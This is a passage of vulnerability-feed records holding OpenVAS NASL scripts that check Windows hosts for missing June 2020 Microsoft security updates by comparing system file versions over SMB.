script_oid(\"1.3.6.1.4.1.25623.1.0.817063\");\n script_version(\"2020-07-16T11:59:37+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1160\",\n \"CVE-2020-1194\", \"CVE-2020-1196\", \"CVE-2020-1207\", \"CVE-2020-1208\",\n \"CVE-2020-1212\", \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\",\n \"CVE-2020-1216\", \"CVE-2020-1219\", \"CVE-2020-1220\", \"CVE-2020-1230\",\n \"CVE-2020-1231\", \"CVE-2020-1236\", \"CVE-2020-1239\", \"CVE-2020-1246\",\n \"CVE-2020-1247\", \"CVE-2020-1251\", \"CVE-2020-1253\", \"CVE-2020-1254\",\n \"CVE-2020-1255\", \"CVE-2020-1260\", \"CVE-2020-1262\", \"CVE-2020-1263\",\n \"CVE-2020-1270\", \"CVE-2020-1272\", \"CVE-2020-1281\", \"CVE-2020-1282\",\n \"CVE-2020-1287\", \"CVE-2020-1291\", \"CVE-2020-1299\", \"CVE-2020-1300\",\n \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1310\", \"CVE-2020-1311\",\n \"CVE-2020-1314\", \"CVE-2020-1315\", \"CVE-2020-1317\", \"CVE-2020-1334\",\n \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 11:59:37 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4561612)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4561612\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple errors in Windows when the Windows kernel-mode driver fails to properly\n handle objects in memory.\n\n - An error when the Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content.\n\n - An error when Windows Modules Installer Service improperly handles class object\n members.\n\n - An error in the way that the VBScript engine handles objects in memory.\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error in the way Windows Error Reporting (WER) handles objects in memory.\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information,\n conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4561612\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0)\n exit(0);\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!dllVer)\n exit(0);\n\nif(version_is_less(version:dllVer, test_version:\"6.2.9200.23063\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Win32k.sys\",\n file_version:dllVer, vulnerable_range:\"Less than Win32k.sys\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1220", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1216", "CVE-2020-1247", "CVE-2020-1246", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1196", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1291", "CVE-2020-1260"], "description": "This host is missing a critical security\n update according to Microsoft KB4561666", "modified": "2020-07-17T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817157", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817157", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561666)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817157\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1160\",\n \"CVE-2020-1194\", \"CVE-2020-1196\", \"CVE-2020-1207\", \"CVE-2020-1208\",\n \"CVE-2020-1212\", \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\",\n \"CVE-2020-1216\", \"CVE-2020-1219\", \"CVE-2020-1220\", \"CVE-2020-1230\",\n \"CVE-2020-1231\", \"CVE-2020-1236\", \"CVE-2020-1239\", \"CVE-2020-1246\",\n \"CVE-2020-1247\", \"CVE-2020-1251\", \"CVE-2020-1253\", \"CVE-2020-1254\",\n \"CVE-2020-1255\", \"CVE-2020-1260\", \"CVE-2020-1262\", \"CVE-2020-1263\",\n \"CVE-2020-1269\", \"CVE-2020-1270\", \"CVE-2020-1272\", \"CVE-2020-1281\",\n \"CVE-2020-1282\", \"CVE-2020-1287\", \"CVE-2020-1291\", \"CVE-2020-1299\",\n \"CVE-2020-1300\", \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1310\",\n \"CVE-2020-1311\", \"CVE-2020-1314\", \"CVE-2020-1315\", \"CVE-2020-1317\",\n \"CVE-2020-1334\", \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4561666)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4561666\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple errors in Windows when the Windows kernel-mode driver fails to properly\n handle objects in memory.\n\n - An error when the Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content.\n\n - An error when Windows Modules Installer Service improperly handles class object\n members.\n\n - An error in the way that the VBScript engine handles objects in memory.\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error in the way Windows Error Reporting (WER) handles objects in memory.\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information,\n conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64-based systems\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4561666\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"Atl.dll\");\nif(!sysVer)\n exit(0);\n\nif(version_is_less(version:sysVer, test_version:\"3.5.2284.0\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Atl.dll\",\n file_version:sysVer, vulnerable_range:\"Less than 3.5.2284.0\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1216", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1197"], "description": "This host is missing a critical security\n update according to Microsoft KB4561649", "modified": "2020-07-17T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817143", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817143", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561649)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817143\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1073\",\n \"CVE-2020-1160\", \"CVE-2020-1194\", \"CVE-2020-1196\", \"CVE-2020-1197\",\n \"CVE-2020-1202\", \"CVE-2020-1203\", \"CVE-2020-1207\", \"CVE-2020-1208\",\n \"CVE-2020-1212\", \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\",\n \"CVE-2020-1216\", \"CVE-2020-1219\", \"CVE-2020-1220\", \"CVE-2020-1230\",\n \"CVE-2020-1231\", \"CVE-2020-1234\", \"CVE-2020-1236\", \"CVE-2020-1239\",\n \"CVE-2020-1246\", \"CVE-2020-1247\", \"CVE-2020-1251\", \"CVE-2020-1253\",\n \"CVE-2020-1254\", \"CVE-2020-1255\", \"CVE-2020-1259\", \"CVE-2020-1260\",\n \"CVE-2020-1261\", \"CVE-2020-1262\", \"CVE-2020-1263\", \"CVE-2020-1264\",\n \"CVE-2020-1266\", \"CVE-2020-1269\", \"CVE-2020-1270\", \"CVE-2020-1271\",\n \"CVE-2020-1272\", \"CVE-2020-1278\", \"CVE-2020-1281\", \"CVE-2020-1282\",\n \"CVE-2020-1287\", \"CVE-2020-1291\", \"CVE-2020-1294\", \"CVE-2020-1299\",\n \"CVE-2020-1300\", \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1304\",\n \"CVE-2020-1305\", \"CVE-2020-1310\", \"CVE-2020-1311\", \"CVE-2020-1314\",\n \"CVE-2020-1315\", \"CVE-2020-1316\", \"CVE-2020-1317\", \"CVE-2020-1334\",\n \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4561649)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4561649\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error in the way that the VBScript engine handles objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information, bypass\n security restrictions, conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4561649\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntoskrnl.exe\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.10240.0\", test_version2:\"10.0.10240.18607\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Ntoskrnl.exe\",\n file_version:dllVer, vulnerable_range:\"10.0.10240.0 - 10.0.10240.18607\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1197", "CVE-2020-1283"], "description": "This host is missing a critical security\n update according to Microsoft KB4561616", "modified": "2020-07-17T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817146", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817146", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561616)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817146\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1073\",\n \"CVE-2020-1160\", \"CVE-2020-1194\", \"CVE-2020-1196\", \"CVE-2020-1197\",\n \"CVE-2020-1202\", \"CVE-2020-1203\", \"CVE-2020-1207\", \"CVE-2020-1208\",\n \"CVE-2020-1211\", \"CVE-2020-1212\", \"CVE-2020-1213\", \"CVE-2020-1214\",\n \"CVE-2020-1215\", \"CVE-2020-1216\", \"CVE-2020-1219\", \"CVE-2020-1220\",\n \"CVE-2020-1230\", \"CVE-2020-1231\", \"CVE-2020-1232\", \"CVE-2020-1234\",\n \"CVE-2020-1235\", \"CVE-2020-1236\", \"CVE-2020-1239\", \"CVE-2020-1241\",\n \"CVE-2020-1246\", \"CVE-2020-1247\", \"CVE-2020-1251\", \"CVE-2020-1253\",\n \"CVE-2020-1254\", \"CVE-2020-1255\", \"CVE-2020-1257\", \"CVE-2020-1259\",\n \"CVE-2020-1260\", \"CVE-2020-1261\", \"CVE-2020-1262\", \"CVE-2020-1263\",\n \"CVE-2020-1264\", \"CVE-2020-1266\", \"CVE-2020-1269\", \"CVE-2020-1270\",\n \"CVE-2020-1271\", \"CVE-2020-1272\", \"CVE-2020-1278\", \"CVE-2020-1279\",\n \"CVE-2020-1281\", \"CVE-2020-1282\", \"CVE-2020-1283\", \"CVE-2020-1287\",\n \"CVE-2020-1291\", \"CVE-2020-1293\", \"CVE-2020-1294\", \"CVE-2020-1299\",\n \"CVE-2020-1300\", \"CVE-2020-1301\", \"CVE-2020-1302\", \"CVE-2020-1304\",\n \"CVE-2020-1305\", \"CVE-2020-1309\", \"CVE-2020-1310\", \"CVE-2020-1311\",\n \"CVE-2020-1314\", \"CVE-2020-1315\", \"CVE-2020-1316\", \"CVE-2020-1317\",\n \"CVE-2020-1334\", \"CVE-2020-1348\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-10 08:52:23 +0530 (Wed, 10 Jun 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4561616)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4561616\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly handle objects in memory.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n - An error when the Windows Runtime improperly handles objects in memory.\n\n - An error in the way Windows Error Reporting (WER) handles objects in memory.\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information, bypass\n security restrictions, conduct spoofing and denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4561616\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntoskrnl.exe\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.14393.0\", test_version2:\"10.0.14393.3749\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Ntoskrnl.exe\",\n file_version:dllVer, vulnerable_range:\"10.0.14393.0 - 10.0.14393.3749\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "description": "This host is missing a critical security\n update according to Microsoft KB4561602", "modified": "2020-07-17T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817141", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817141", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561602)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817141\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1073\",\n \"CVE-2020-1160\", \"CVE-2020-1162\", \"CVE-2020-1194\", \"CVE-2020-1196\",\n \"CVE-2020-1197\", \"CVE-2020-1199\", \"CVE-2020-1201\", \"CVE-2020-1202\",\n \"CVE-2020-1203\", \"CVE-2020-1207\", \"CVE-2020-1208\", \"CVE-2020-1211\",\n \"CVE-2020-1212\", \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\",\n \"CVE-2020-1216\", \"CVE-2020-1217\", \"CVE-2020-1219\", \"CVE-2020-1220\",\n \"CVE-2020-1222\", \"CVE-2020-1230\", \"CVE-2020-1231\", \"CVE-2020-1232\",\n \"CVE-2020-1233\", \"CVE-2020-1234\", \"CVE-2020-1235\", \"CVE-2020-1236\",\n \"CVE-2020-1237\", \"CVE-2020-1238\", \"CVE-2020-1239\", \"CVE-2020-1241\",\n \"CVE-2020-1246\", \"CVE-2020-1247\", \"CVE-2020-1251\", \"CVE-2020-1253\",\n \"CVE-2020-1254\", \"CVE-2020-1255\", \"CVE-2020-1257\", \"CVE-2020-1258\",\n \"CVE-2020-1259\", \"CVE-2020-1260\", \"CVE-2020-1261\", \"CVE-2020-1262\",\n \"CVE-2020-1263\", \"CVE-2020-1264\", \"CVE-2020-1266\", \"CVE-2020-1269\",\n \"CVE-2020-1270\", \"CVE-2020-1271\", \"CVE-2020-1272\", \"CVE-2020-1278\",\n \"CVE-2020-1279\", \"CVE-2020-1280\", \"CVE-2020-1281\", \"CVE-2020-1282\",\n \"CVE-2020-1283\", \"CVE-2020-1286\", \"CVE-2020-1287\", 